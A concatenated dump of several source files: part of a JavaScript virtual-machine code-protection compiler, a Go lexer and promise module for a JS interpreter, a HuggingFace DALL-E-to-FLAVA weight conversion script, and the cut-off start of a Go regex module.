let bcnxbc = []
startgetType(node.block, variablePool, bcnxbc)
bcnxbc.push(RandDataCheise(zhilDx.z200))
zhili.push(bcnxbc.length)
if (node.handler != null){
variablePool[node.handler.param.name] = null
startgetType(node.handler.param, variablePool, bcnxbc)
bcnxbc.pop()
bcnxbc.push(RandDataCheise(zhilDx.z197))
startgetType(node.handler.body, variablePool, bcnxbc)
}
bcnxbc.push(RandDataCheise(zhilDx.z200))
zhili.push(bcnxbc.length - zhili[zhili.length-1])
if (node.finalizer != null){
startgetType(node.finalizer, variablePool, bcnxbc)
}
bcnxbc.push(RandDataCheise(zhilDx.z200))
zhili.push(bcnxbc.length - zhili[zhili.length-1]- zhili[zhili.length-2])
copyArrayList(zhili, bcnxbc)
break
case "AssignmentPattern":
case "AssignmentExpression":
if (node.operator == '+='){
startgetType(node.left, variablePool, zhili)
zhili.pop()
startgetType(node.left, variablePool, zhili)
startgetType(node.right, variablePool, zhili)
zhili.push(RandDataCheise(zhilDx.z20))
zhili.push(RandDataCheise(zhilDx.z90))
}else if (node.operator == '-='){
startgetType(node.left, variablePool, zhili)
zhili.pop()
startgetType(node.left, variablePool, zhili)
startgetType(node.right, variablePool, zhili)
zhili.push(RandDataCheise(zhilDx.z291))
zhili.push(RandDataCheise(zhilDx.z90))
}else if (node.operator == '|='){
startgetType(node.left, variablePool, zhili)
zhili.pop()
startgetType(node.left, variablePool, zhili)
startgetType(node.right, variablePool, zhili)
zhili.push(RandDataCheise(zhilDx.z32))
zhili.push(RandDataCheise(zhilDx.z90))
}else if(datkey.indexOf(node.operator) != -1){
startgetType(node.left, variablePool, zhili)
zhili.pop()
startgetType(node.left, variablePool, zhili)
startgetType(node.right, variablePool, zhili)
zhili.push(RandDataCheise(zhilDx["z"+dat[node.operator.replace("=","")]]))
zhili.push(RandDataCheise(zhilDx.z90))
}else{
startgetType(node.left, variablePool, zhili)
zhili.pop()
startgetType(node.right, variablePool, zhili)
zhili.push(RandDataCheise(zhilDx.z290))
}
// startgetType(node.left, variablePool, zhili)
break;
case "ExpressionStatement":
startgetType(node.expression, variablePool, zhili)
break
case "BlockStatement":
for (a1= 0; a1< node.body.length; a1++){
startgetType(node.body[a1], variablePool, zhili)
}
break
case "ThisExpression":
zhili.push(RandDataCheise(zhilDx.z47))
break
case "NewExpression":
let callargsNum = node.arguments.length;
for (let i =0; i< node.arguments.length; i++){
startgetType(node.arguments[i], variablePool, zhili)
}
startgetType(node.callee, variablePool,zhili)
zhili.push(RandDataCheise(zhilDx.z46))
zhili.push(callargsNum)
break
case "ReturnStatement":
startgetType(node.argument, variablePool, zhili)
zhili.push(RandDataCheise(zhilDx.z200))
break
default:
console.log(generator(node).code)
console.log("is not jiex");
}
}
// Compile a function AST node into its own bytecode unit "awcbb_yhh_fun<N>".
// Registers the unit in the global `changlc` table, emits parameter-binding
// opcodes, compiles the body via startgetType, and finally prepends a header
// that pre-declares every nested function name (hoisting).
function startfun(node2){
    // Allocate a fresh unit name; numberKuai is the global unit counter.
    let name = "awcbb_yhh_fun"+numberKuai
    numberKuai += 1
    changlc[name] = {"variablePool":{}
        , "zhili": []}
    // Bind each parameter: default-valued params (AssignmentPattern) first
    // evaluate their default, plain identifiers are bound directly.
    for (let i =0; i< node2.params.length; i++){
        if (node2.params[i].type === "AssignmentPattern"){
            changlc[name]['variablePool'][node2.params[i].left.name] = null
            startgetType(node2.params[i], changlc[name]['variablePool'], changlc[name]['zhili'])
            changlc[name]['zhili'].push(RandDataCheise(zhilDx.z10))
            changlc[name]['zhili'].push(toPool(node2.params[i].left.name))
        }else{
            changlc[name]['variablePool'][node2.params[i].name] = null
            changlc[name]['zhili'].push(RandDataCheise(zhilDx.z10))
            changlc[name]['zhili'].push(toPool(node2.params[i].name))
        }
    }
    // z2 marks the end of the parameter-binding prologue.
    changlc[name]['zhili'].push(RandDataCheise(zhilDx.z2))
    startgetType(node2.body, changlc[name]['variablePool'], changlc[name]['zhili'])
    // Hoisting header: pre-declare names whose pool slot points at a nested
    // function unit ("awcbb_yhh_fun..."), then terminate the header with z1.
    let hb = []
    for (let i in changlc[name]['variablePool']){
        if (changlc[name]['variablePool'][i] && changlc[name]['variablePool'][i].indexOf("awcbb_yhh_fun") != -1){
            hb.push(RandDataCheise(zhilDx.z10))
            hb.push(toPool(i))
        }
    }
    hb.push(RandDataCheise(zhilDx.z1))
    // Splice the header onto the front of the unit (pop reverses, preserving order).
    let f = hb.length
    for (let i =0;i< f; i++){
        changlc[name]['zhili'].splice(0,0,hb.pop())
    }
}
// Compile the top-level Program node into its own bytecode unit, mirroring
// startfun but without a parameter prologue: compile every top-level
// statement, then prepend a hoisting header for nested function names.
function start(node2){
    // Allocate a fresh unit name; numberKuai is the global unit counter.
    const name = "awcbb_yhh_fun" + numberKuai
    numberKuai += 1
    changlc[name] = {"variablePool": {}, "zhili": []}
    const pool = changlc[name]['variablePool']
    const code = changlc[name]['zhili']
    for (const stmt of node2.program.body){
        startgetType(stmt, pool, code)
    }
    // Hoisting header: pre-declare names whose pool slot points at a nested
    // function unit ("awcbb_yhh_fun..."), then terminate the header with z1.
    const header = []
    for (const varName in pool){
        if (pool[varName] && pool[varName].indexOf("awcbb_yhh_fun") != -1){
            header.push(RandDataCheise(zhilDx.z10))
            header.push(toPool(varName))
        }
    }
    header.push(RandDataCheise(zhilDx.z1))
    // Splice the header onto the front of the unit (pop reverses, preserving order).
    while (header.length){
        code.splice(0, 0, header.pop())
    }
}
// Compile the parsed program, then emit the runtime bundle: the constant
// pool and bytecode tables are serialised as JS source and prepended to the
// interpreter template (dataText2).
start(ast)
var datatext = "var constantPool = "+ JSON.stringify(constantPool)+"; var changlc = "+ JSON.stringify(changlc)+";\n"+dataText2;
// Re-parse and regenerate compactly to minify the output bundle.
var d = parser.parse(datatext)
d = generator(d,{
    compact:true
}).code
// NOTE(review): fs.writeFileSync takes an options object, not a callback —
// the (e)=>{} arg looks like a leftover from async writeFile; verify.
fs.writeFileSync(outpath, d, (e)=>{})
}
// Script entry point: time the whole protection run.
const tst = + new Date()
// Input: the JS source file to virtualise.
const soure = "t3.js"
// Output: the generated VM + bytecode bundle.
const outpath = "./outsrc/out.js"
cbbjsvmp(soure,outpath)
console.log("user time =>", +new Date() - tst)
// NOTE: the ES6->ES5 transpile plugin is broken; the README describes a
// manual conversion path (kept below for reference).
// if (offes5 ===1){
//     process.exec(`traceur --script ./src/${soure} --out ./dist/${soure}`, (error, stdout, stderr) => {
//         if (!error) {
//             console.log("es6 to es5 ==> 成功");
//             cbbjsvmp()
//             console.log("file is save ==> ./outsrc/out.js");
//             console.log("user time =>", +new Date() - tst)
//         } else {
//             console.log("es6 to es5 ==> 失败");
//         }
//     });
// } else {
//     cbbjsvmp()
//     console.log("file is save ==> ./outsrc/out.js");
//     console.log("user time =>", +new Date() - tst)
// }
|
2833844911/gojsvmp | 15,348 | lexer/lexer.go | package lexer
import (
"myvmp/token"
"regexp"
)
// LexerParse is a hand-rolled scanner over a JS-like source string.
type LexerParse struct {
	keyList   []string // reserved; not used by the methods in this file
	value     string   // the normalised source text being scanned
	start     int      // index of the last consumed byte; begins at -1
	maxlength int      // len(value), cached for bounds checks
}

// CardList is a simple container for a scanned token sequence.
type CardList struct {
	value []*token.TokenType
}
// New builds a LexerParse over dt after normalising stray semicolons:
// whitespace-separated runs of ";" collapse to a single ";", and "{"
// followed by semicolons collapses to "{".
func New(dt string) *LexerParse {
	squashSemis := regexp.MustCompile(`[;]+\s*[;]+`)
	squashBrace := regexp.MustCompile(`[{]+\s*[;]+`)
	normalised := squashBrace.ReplaceAllString(squashSemis.ReplaceAllString(dt, ";"), "{")
	return &LexerParse{value: normalised, start: -1, maxlength: len(normalised)}
}
// clearNop advances start across a run of NOP (space) characters, leaving
// start just before the first non-NOP byte, or at/after end of input.
func (lp *LexerParse) clearNop() {
	for lp.start++; lp.start < lp.maxlength; lp.start++ {
		if lp.value[lp.start:lp.start+1] != token.NOP {
			lp.start--
			return
		}
	}
}

// clearZhus skips the remainder of a // comment, leaving start just before
// the next statement terminator (OVER) or newline (HUANH), or at/after end
// of input.
func (lp *LexerParse) clearZhus() {
	for lp.start++; lp.start < lp.maxlength; lp.start++ {
		c := lp.value[lp.start : lp.start+1]
		if c == token.OVER || c == token.HUANH {
			lp.start--
			return
		}
	}
}
func (lp *LexerParse) readCard() string {
carddt := token.Kong
for {
lp.start++
if lp.start >= lp.maxlength {
//fmt.Println("结束")
return token.NNNN
}
chardt := lp.value[lp.start : lp.start+1]
if chardt == token.NOP || chardt == token.TB || chardt == token.TR || chardt == token.YIHUO || chardt == token.HUANH || chardt == token.DUOZF || chardt == token.Dian || chardt == token.QUYU || chardt == token.Str || chardt == token.Str2 || chardt == token.QUFAN || chardt == token.MAOHAO || chardt == token.YU || chardt == token.HUO || chardt == token.DENYU || chardt == token.XIAOYH || chardt == token.DAYH || chardt == token.ZUOZ || chardt == token.YOUZ || chardt == token.ZUOKH || chardt == token.YOUKH || chardt == token.ZHUOK || chardt == token.YOUOK || chardt == token.OVER || chardt == token.ADD || chardt == token.SDD || chardt == token.DH || chardt == token.CHEN || chardt == token.CHU {
if chardt == token.NOP {
lp.clearNop()
if carddt == token.NNNN {
continue
}
}
if lp.start+2 < lp.maxlength && lp.value[lp.start:lp.start+2] == token.CHU+token.CHU {
lp.clearZhus()
continue
}
if carddt != token.NNNN {
if chardt != token.NOP {
lp.start--
}
} else {
if lp.start+3 < lp.maxlength && lp.value[lp.start:lp.start+3] == token.DXIAND {
lp.start = lp.start + 2
return lp.value[lp.start-2 : lp.start+1]
}
if lp.start+3 < lp.maxlength && lp.value[lp.start:lp.start+3] == token.DAYHYHYU {
lp.start = lp.start + 2
return lp.value[lp.start-2 : lp.start+1]
}
if lp.start+3 < lp.maxlength && lp.value[lp.start:lp.start+3] == token.XIAOYHYHYH {
lp.start = lp.start + 2
return lp.value[lp.start-2 : lp.start+1]
}
if lp.start+3 < lp.maxlength && lp.value[lp.start:lp.start+3] == token.BUDYDY {
lp.start = lp.start + 2
return lp.value[lp.start-2 : lp.start+1]
}
if lp.start+2 < lp.maxlength && lp.value[lp.start:lp.start+2] == token.XIAND {
lp.start = lp.start + 1
return lp.value[lp.start-1 : lp.start+1]
}
if lp.start+2 < lp.maxlength && lp.value[lp.start:lp.start+2] == token.KAIFAN {
lp.start = lp.start + 1
return lp.value[lp.start-1 : lp.start+1]
}
if lp.start+2 < lp.maxlength && lp.value[lp.start:lp.start+2] == token.XIAOYHDY {
lp.start = lp.start + 1
return lp.value[lp.start-1 : lp.start+1]
}
if lp.start+2 < lp.maxlength && lp.value[lp.start:lp.start+2] == token.DAYHDY {
lp.start = lp.start + 1
return lp.value[lp.start-1 : lp.start+1]
}
if lp.start+2 < lp.maxlength && lp.value[lp.start:lp.start+2] == token.BUDY {
lp.start = lp.start + 1
return lp.value[lp.start-1 : lp.start+1]
}
if lp.start+2 < lp.maxlength && lp.value[lp.start:lp.start+2] == token.DAYHYH {
lp.start = lp.start + 1
return lp.value[lp.start-1 : lp.start+1]
}
if lp.start+2 < lp.maxlength && lp.value[lp.start:lp.start+2] == token.UPADD {
lp.start = lp.start + 1
return lp.value[lp.start-1 : lp.start+1]
}
if lp.start+2 < lp.maxlength && lp.value[lp.start:lp.start+2] == token.UPASD {
lp.start = lp.start + 1
return lp.value[lp.start-1 : lp.start+1]
}
if lp.start+2 < lp.maxlength && lp.value[lp.start:lp.start+2] == token.JIADEN {
lp.start = lp.start + 1
return lp.value[lp.start-1 : lp.start+1]
}
if lp.start+2 < lp.maxlength && lp.value[lp.start:lp.start+2] == token.JANDEN {
lp.start = lp.start + 1
return lp.value[lp.start-1 : lp.start+1]
}
if lp.start+2 < lp.maxlength && lp.value[lp.start:lp.start+2] == token.XIAOYHYH {
lp.start = lp.start + 1
return lp.value[lp.start-1 : lp.start+1]
}
if lp.start+2 < lp.maxlength && lp.value[lp.start:lp.start+2] == token.HUOHUO {
lp.start = lp.start + 1
return lp.value[lp.start-1 : lp.start+1]
}
if lp.start+2 < lp.maxlength && lp.value[lp.start:lp.start+2] == token.YUYU {
lp.start = lp.start + 1
return lp.value[lp.start-1 : lp.start+1]
}
carddt = chardt
}
if chardt == token.Dian && isDigit(lp.value[lp.start+2]) {
lp.start++
} else {
return carddt
}
}
carddt += chardt
}
}
// isDigit reports whether ch is an ASCII decimal digit.
func isDigit(ch byte) bool {
	return ch >= '0' && ch <= '9'
}
// readQuoted consumes characters up to (and including) the closing
// terminator term, returning the decoded contents. Handled escapes: \n, \t,
// \\ and an escaped quote character escQuote. All three literal styles map
// the escaped quote to a double quote in the output, exactly as the three
// original copy-pasted readers did.
// NOTE(review): for single-quoted strings this turns \' into `"` — an
// inherited quirk of the original readStr2; confirm before changing.
func (lp *LexerParse) readQuoted(term string, escQuote string) string {
	out := ""
	prev := ""
	for {
		lp.start++
		ch := lp.value[lp.start : lp.start+1]
		if prev == "\\" && ch == "n" {
			ch = "\n"
		} else if prev == "\\" && ch == "t" {
			ch = "\t"
		} else if prev == "\\" && ch == escQuote {
			prev = ch
			out += "\""
			continue
		} else if prev == "\\" && ch == "\\" {
			// Mark the backslash consumed so the next char is not escaped.
			prev = "\\\\"
			out += "\\"
			continue
		}
		prev = ch
		if ch == term {
			break
		}
		if prev == "\\" {
			// Hold the backslash: it escapes the following character.
			continue
		}
		out += ch
	}
	return out
}

// readStr reads a double-quoted string body (opening quote already consumed).
func (lp *LexerParse) readStr() string {
	return lp.readQuoted(token.Str, "\"")
}

// readStr3 reads a template-literal (backtick) string body.
func (lp *LexerParse) readStr3() string {
	return lp.readQuoted(token.DUOZF, "\"")
}

// readStr2 reads a single-quoted string body.
func (lp *LexerParse) readStr2() string {
	return lp.readQuoted(token.Str2, "'")
}
func (lp *LexerParse) nextCard() *token.TokenType {
for {
if lp.start >= lp.maxlength {
//fmt.Println("结束")
return &token.TokenType{
TypeInfo: token.DONT,
}
}
card := lp.readCard()
switch card {
case token.VAR:
return &token.TokenType{
TypeInfo: token.VAR,
Value: card,
PAXU: token.ONE,
}
case token.UPADD:
return &token.TokenType{
TypeInfo: token.UPADD,
Value: card,
PAXU: token.ONE,
}
case token.UPASD:
return &token.TokenType{
TypeInfo: token.UPASD,
Value: card,
PAXU: token.ONE,
}
case token.IN:
return &token.TokenType{
TypeInfo: token.IN,
Value: card,
PAXU: token.ONE,
}
case token.DAYHDY:
return &token.TokenType{
TypeInfo: token.DAYHDY,
Value: card,
PAXU: token.ZNO,
}
case token.XIAOYHDY:
return &token.TokenType{
TypeInfo: token.XIAOYHDY,
Value: card,
PAXU: token.ZNO,
}
case token.MAOHAO:
return &token.TokenType{
TypeInfo: token.MAOHAO,
Value: card,
PAXU: token.ZNO,
}
case token.DAYHYH:
return &token.TokenType{
TypeInfo: token.DAYHYH,
Value: card,
PAXU: token.ZNO,
}
case token.DAYHYHYU:
return &token.TokenType{
TypeInfo: token.DAYHYHYU,
Value: card,
PAXU: token.ZNO,
}
case token.XIAOYHYH:
return &token.TokenType{
TypeInfo: token.XIAOYHYH,
Value: card,
PAXU: token.ZNO,
}
case token.HUOHUO:
return &token.TokenType{
TypeInfo: token.HUOHUO,
Value: card,
PAXU: token.ONE,
}
case token.YUYU:
return &token.TokenType{
TypeInfo: token.YUYU,
Value: card,
PAXU: token.ONE,
}
case token.HUO:
return &token.TokenType{
TypeInfo: token.HUO,
Value: card,
PAXU: token.ZNO,
}
case token.YU:
return &token.TokenType{
TypeInfo: token.YU,
Value: card,
PAXU: token.ZNO,
}
case token.XIAOYHYHYH:
return &token.TokenType{
TypeInfo: token.XIAOYHYHYH,
Value: card,
PAXU: token.ZNO,
}
case token.DENYU:
return &token.TokenType{
TypeInfo: token.DENYU,
Value: card,
PAXU: token.ONE,
}
case token.JIADEN:
return &token.TokenType{
TypeInfo: token.JIADEN,
Value: card,
PAXU: token.ONE,
}
case token.JANDEN:
return &token.TokenType{
TypeInfo: token.JANDEN,
Value: card,
PAXU: token.ONE,
}
case token.SDD:
return &token.TokenType{
TypeInfo: token.SDD,
Value: card,
PAXU: token.TWO,
}
case token.IF:
return &token.TokenType{
TypeInfo: token.IF,
Value: card,
PAXU: token.ONE,
}
case token.NULL:
return &token.TokenType{
TypeInfo: token.NULL,
Value: card,
PAXU: token.ONE,
}
case token.CHU:
return &token.TokenType{
TypeInfo: token.CHU,
Value: card,
PAXU: token.SCRRR,
}
case token.YIHUO:
return &token.TokenType{
TypeInfo: token.YIHUO,
Value: card,
PAXU: token.SCRRR,
}
case token.TYPEOF:
return &token.TokenType{
TypeInfo: token.TYPEOF,
Value: card,
PAXU: token.SCRRR,
}
case token.OVER:
return &token.TokenType{
TypeInfo: token.OVER,
Value: card,
PAXU: token.ONE,
}
case token.HUANH:
return &token.TokenType{
TypeInfo: token.OVER,
Value: card,
PAXU: token.ONE,
}
case token.Str:
ddd := lp.readStr()
return &token.TokenType{
TypeInfo: token.Str,
Value: ddd,
PAXU: token.FOTT,
}
case token.TB:
continue
case token.TR:
continue
case token.Str2:
ddd := lp.readStr2()
return &token.TokenType{
TypeInfo: token.Str,
Value: ddd,
PAXU: token.FOTT,
}
case token.DUOZF:
ddd := lp.readStr3()
return &token.TokenType{
TypeInfo: token.Str,
Value: ddd,
PAXU: token.FOTT,
}
case token.ADD:
return &token.TokenType{
TypeInfo: token.ADD,
Value: card,
PAXU: token.TWO,
}
case token.TRY:
return &token.TokenType{
TypeInfo: token.TRY,
Value: card,
PAXU: token.TWO,
}
case token.CATCH:
return &token.TokenType{
TypeInfo: token.CATCH,
Value: card,
PAXU: token.TWO,
}
case token.FOR:
return &token.TokenType{
TypeInfo: token.FOR,
Value: card,
PAXU: token.ONE,
}
case token.XIAOYH:
return &token.TokenType{
TypeInfo: token.XIAOYH,
Value: card,
PAXU: token.ZNO,
}
case token.Debug:
return &token.TokenType{
TypeInfo: token.Debug,
Value: card,
PAXU: token.ZNO,
}
case token.DAYH:
return &token.TokenType{
TypeInfo: token.DAYH,
Value: card,
PAXU: token.ZNO,
}
case token.BREAK:
return &token.TokenType{
TypeInfo: token.BREAK,
Value: card,
PAXU: token.ONE,
}
case token.CONTINUE:
return &token.TokenType{
TypeInfo: token.CONTINUE,
Value: card,
PAXU: token.ONE,
}
case token.THIS:
return &token.TokenType{
TypeInfo: token.THIS,
Value: card,
PAXU: token.ONE,
}
case token.DH:
return &token.TokenType{
TypeInfo: token.DH,
Value: card,
PAXU: token.ONE,
}
case token.FUN:
return &token.TokenType{
TypeInfo: token.FUN,
Value: card,
PAXU: token.ONE,
}
case token.ELSE:
return &token.TokenType{
TypeInfo: token.ELSE,
Value: card,
PAXU: token.ONE,
}
case token.YOUOK:
return &token.TokenType{
TypeInfo: token.YOUOK,
Value: card,
PAXU: token.ONE,
}
case token.YOUKH:
return &token.TokenType{
TypeInfo: token.YOUKH,
Value: card,
PAXU: token.ONE,
}
case token.ZUOKH:
return &token.TokenType{
TypeInfo: token.ZUOKH,
Value: card,
PAXU: token.ONE,
}
case token.ZHUOK:
return &token.TokenType{
TypeInfo: token.ZHUOK,
Value: card,
PAXU: token.ONE,
}
case token.KAIFAN:
return &token.TokenType{
TypeInfo: token.KAIFAN,
Value: card,
PAXU: token.SCRRR,
}
case token.XIAND:
return &token.TokenType{
TypeInfo: token.XIAND,
Value: card,
PAXU: token.ZNO,
}
case token.BUDY:
return &token.TokenType{
TypeInfo: token.BUDY,
Value: card,
PAXU: token.ZNO,
}
case token.BUDYDY:
return &token.TokenType{
TypeInfo: token.BUDYDY,
Value: card,
PAXU: token.ZNO,
}
case token.QUFAN:
return &token.TokenType{
TypeInfo: token.QUFAN,
Value: card,
PAXU: token.SIX,
}
case token.DXIAND:
return &token.TokenType{
TypeInfo: token.DXIAND,
Value: card,
PAXU: token.ZNO,
}
case token.CHEN:
return &token.TokenType{
TypeInfo: token.CHEN,
Value: card,
PAXU: token.SCRRR,
}
case token.QUYU:
return &token.TokenType{
TypeInfo: token.QUYU,
Value: card,
PAXU: token.SCRRR,
}
case token.END:
return &token.TokenType{
TypeInfo: token.END,
Value: card,
PAXU: token.ONE,
}
case token.NEW:
return &token.TokenType{
TypeInfo: token.NEW,
Value: card,
PAXU: token.ONE,
}
case token.RETURN:
return &token.TokenType{
TypeInfo: token.RETURN,
Value: card,
PAXU: token.ONE,
}
case token.YOUZ:
return &token.TokenType{
TypeInfo: token.YOUZ,
Value: card,
PAXU: token.SCRRR,
}
case token.ZUOZ:
return &token.TokenType{
TypeInfo: token.ZUOZ,
Value: card,
PAXU: token.ONE,
}
case token.Dian:
return &token.TokenType{
TypeInfo: token.Dian,
Value: card,
PAXU: token.ONE,
}
default:
if isDigit(card[0]) {
return &token.TokenType{
TypeInfo: token.INT,
Value: card,
PAXU: token.ONE,
}
} else {
return &token.TokenType{
TypeInfo: token.IDENT,
Value: card,
PAXU: token.ONE,
}
}
}
}
}
// Input tokenises the whole source, returning every token up to (but not
// including) the END marker.
func (lp *LexerParse) Input() []*token.TokenType {
	tokens := []*token.TokenType{}
	for tok := lp.nextCard(); tok.TypeInfo != token.END; tok = lp.nextCard() {
		tokens = append(tokens, tok)
	}
	return tokens
}
|
2833844911/gojsvmp | 2,325 | promise/promise.go | package promise
import (
"myvmp/ast"
"myvmp/object"
"myvmp/token"
"sync"
)
// AllInfo tracks every promise-callback goroutine still in flight (Done waits on it).
var AllInfo sync.WaitGroup

// paseData is the interpreter's eval entry point, injected via Init —
// presumably kept as a pointer to avoid an import cycle with the evaluator.
var paseData *func(dtt *ast.Statement, env *object.Environment) object.Object
// Promise_thenT is the native body installed for then-callbacks: it binds
// the call arguments to the callback's parameter names (missing arguments
// become NULL), then evaluates the callback body on its own goroutine,
// registered with AllInfo so Done() can wait for it. Always returns NULL.
func Promise_thenT(myfun *object.FunctionDeclarationObject) object.Object {
	//fmt.Println(myfun.Args[0], "thenjjjjjjjjjjjjjjjjj")
	dbb := myfun.Args
	fuenv := myfun.Env
	for idx, vkey := range myfun.Params {
		// Callback parameters are plain identifiers in the AST.
		zzkey := (*vkey).(*ast.Identifier).Name
		//if (zzkey == "rerea"){
		//	fmt.Println()
		//}
		if idx >= len(dbb) {
			// Fewer arguments than parameters: pad with NULL, JS-style.
			fuenv.Store.Set(zzkey, &object.NULLObject{})
			continue
		}
		fuenv.Store.Set(zzkey, *dbb[idx])
	}
	AllInfo.Add(1)
	go func() {
		defer AllInfo.Done()
		// paseData is the evaluator injected via Init.
		(*paseData)(&myfun.Body, myfun.Env)
	}()
	return &object.NULLObject{}
}
// Promise_then registers then-callbacks on the promise environment: Args[0]
// becomes the fulfilment callback (slot cbb_a), the optional Args[1] the
// rejection callback (slot cbb_b). Both share Promise_thenT as their native
// body. Returns a fresh child environment so .then calls can be chained.
func Promise_then(myfun *object.FunctionDeclarationObject) object.Object {
	promise_thenT := Promise_thenT
	fundd := (*myfun.Args[0]).(*object.FunctionDeclarationObject)
	newEnv := NewEnv(myfun.Env, fundd.Params)
	myfun.Env.Store.Set(token.Cbb_a, &object.FunctionDeclarationObject{Params: fundd.Params, IsNative: 1, NativeBody: &promise_thenT, Env: newEnv, Body: fundd.Body})
	if len(myfun.Args) >= 2 {
		fundd2 := (*myfun.Args[1]).(*object.FunctionDeclarationObject)
		myfun.Env.Store.Set(token.Cbb_b, &object.FunctionDeclarationObject{Params: fundd2.Params, IsNative: 1, NativeBody: &promise_thenT, Env: newEnv, Body: fundd2.Body})
	}
	//dtold := myfun.Args[1]
	return newEnv
}
// NewEnv wraps eg in a fresh promise environment: it pre-registers a native
// "then" (sharing the callback parameter list ddp) plus the cbb_a / cbb_b
// callback slots, initially NULL, that Promise_then later fills in.
func NewEnv(eg *object.Environment, ddp []*ast.Statement) *object.Environment {
	store := object.NewSafeMap()
	env := &object.Environment{Store: store, Outer: eg, TypeInfo: token.ENV}
	thenImpl := Promise_then
	store.Set(token.Promise_then, &object.FunctionDeclarationObject{Params: ddp, IsNative: 1, NativeBody: &thenImpl, Env: env})
	store.Set(token.Cbb_a, &object.NULLObject{})
	store.Set(token.Cbb_b, &object.NULLObject{})
	return env
}
// Init launches a promise executor: dofun is the evaluator (cached globally
// in paseData), funcdt the executor function object, env its outer scope.
// The executor body runs on its own goroutine (tracked by AllInfo); the new
// promise environment is returned immediately so .then can be attached.
// NOTE(review): paseData is a package-global, so concurrent Init calls with
// different evaluators would race — presumably only one evaluator exists.
func Init(dofun *func(dtt *ast.Statement, env *object.Environment) object.Object, funcdt *object.Object, env *object.Environment) object.Object {
	fundd := (*funcdt).(*object.FunctionDeclarationObject)
	newEnv := NewEnv(env, fundd.Params)
	paseData = dofun
	fundd.Env = newEnv
	AllInfo.Add(1)
	go func() {
		defer AllInfo.Done()
		(*dofun)(&fundd.Body, newEnv)
	}()
	return newEnv
}
// CyJSInit resets the global goroutine tracker before a fresh script run.
func CyJSInit() {
	AllInfo = sync.WaitGroup{}
}

// Done blocks until every promise-callback goroutine has finished.
func Done() {
	AllInfo.Wait()
}
|
27182812/ChatGLM-LLaMA-chinese-insturct | 3,428 | src/transformers/models/flava/convert_dalle_to_flava_codebook.py | # coding=utf-8
# Copyright 2022 Meta Platforms authors and The HuggingFace Team. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import argparse
import os
import torch
from transformers import FlavaImageCodebook, FlavaImageCodebookConfig
def rreplace(s, old, new, occurrence):
    """Return *s* with its last *occurrence* occurrences of *old* replaced by *new*.

    Like ``str.replace`` but scanning from the right, e.g.
    ``rreplace("a.b.c", ".", "/", 1) == "a.b/c"``.
    """
    return new.join(s.rsplit(old, occurrence))
def count_parameters(state_dict):
    """Sum every parameter value in *state_dict* as a float32 scalar tensor.

    ``encoder.embeddings`` entries are skipped: they are double copied in the
    original FLAVA checkpoint, so including them would skew the comparison
    between the original and converted state dicts.
    """
    total = 0
    for key, param in state_dict.items():
        if "encoder.embeddings" in key:
            continue
        total = total + param.float().sum()
    return total
def upgrade_state_dict(state_dict):
    """Rename DALL-E encoder keys to the FLAVA codebook layout, casting values to float32.

    Applied renames, in order:
    - ``group_N.`` -> ``group_N.group.`` for N in 1..4
    - ``res_path.`` -> ``res_path.path.``
    - trailing ``.w`` / ``.b`` -> ``.weight`` / ``.bias``
    """
    renamed = {}
    group_prefixes = ("group_1", "group_2", "group_3", "group_4")
    for key, value in state_dict.items():
        for group in group_prefixes:
            if group in key:
                key = key.replace(f"{group}.", f"{group}.group.")
        if "res_path" in key:
            key = key.replace("res_path.", "res_path.path.")
        # Suffix-only swap: replacing the final ".w"/".b" is equivalent to
        # replacing the last occurrence, since endswith guarantees position.
        if key.endswith(".w"):
            key = key[: -len(".w")] + ".weight"
        if key.endswith(".b"):
            key = key[: -len(".b")] + ".bias"
        renamed[key] = value.float()
    return renamed
@torch.no_grad()
def convert_dalle_checkpoint(checkpoint_path, pytorch_dump_folder_path, config_path=None, save_checkpoint=True):
    """
    Copy/paste/tweak model's weights to transformers design.

    Loads a DALL-E codebook checkpoint (local path or URL), renames its keys
    to the FLAVA layout via ``upgrade_state_dict``, loads them into a
    ``FlavaImageCodebook`` and either saves the converted model to
    ``pytorch_dump_folder_path`` (default) or returns the converted state
    dict when ``save_checkpoint`` is False.
    """
    # Local import: dall_e is an optional third-party dependency only needed
    # for conversion, so it is not imported at module level.
    from dall_e import Encoder

    encoder = Encoder()
    # checkpoint_path may be a local file or a downloadable URL.
    if os.path.exists(checkpoint_path):
        ckpt = torch.load(checkpoint_path)
    else:
        ckpt = torch.hub.load_state_dict_from_url(checkpoint_path)

    # Some published checkpoints pickle the whole Encoder module rather than
    # just its state dict.
    if isinstance(ckpt, Encoder):
        ckpt = ckpt.state_dict()
    encoder.load_state_dict(ckpt)

    if config_path is not None:
        config = FlavaImageCodebookConfig.from_pretrained(config_path)
    else:
        config = FlavaImageCodebookConfig()

    hf_model = FlavaImageCodebook(config).eval()
    state_dict = encoder.state_dict()

    hf_state_dict = upgrade_state_dict(state_dict)
    hf_model.load_state_dict(hf_state_dict)
    hf_state_dict = hf_model.state_dict()
    # Sanity check: parameter mass must survive the rename round-trip.
    hf_count = count_parameters(hf_state_dict)
    state_dict_count = count_parameters(state_dict)

    assert torch.allclose(hf_count, state_dict_count, atol=1e-3)

    if save_checkpoint:
        hf_model.save_pretrained(pytorch_dump_folder_path)
    else:
        return hf_state_dict
if __name__ == "__main__":
    # CLI wrapper: converts a DALL-E codebook checkpoint into a FLAVA image
    # codebook and saves it. Note that save_checkpoint is not exposed as a
    # flag, so running from the CLI always writes the converted model.
    parser = argparse.ArgumentParser()
    parser.add_argument("--pytorch_dump_folder_path", default=None, type=str, help="Path to the output PyTorch model.")
    parser.add_argument("--checkpoint_path", default=None, type=str, help="Path to flava checkpoint")
    parser.add_argument("--config_path", default=None, type=str, help="Path to hf config.json of model to convert")
    args = parser.parse_args()
    convert_dalle_checkpoint(args.checkpoint_path, args.pytorch_dump_folder_path, args.config_path)
|
2833844911/gojsvmp | 1,517 | re/re.go | package re
import (
"fmt"
"myvmp/object"
"regexp"
)
// new_Func wraps a native Go implementation as a callable script function
// object, bound to the receiver described by typeS / Obj.
func new_Func(ddd *func(*object.FunctionDeclarationObject) object.Object, typeS string, Obj any) object.Object {
	return &object.FunctionDeclarationObject{IsNative: 1, NativeBody: ddd, BindType: typeS, BindOb: Obj}
}
// Re_findall compiles Args[0] as a regular expression and returns a script
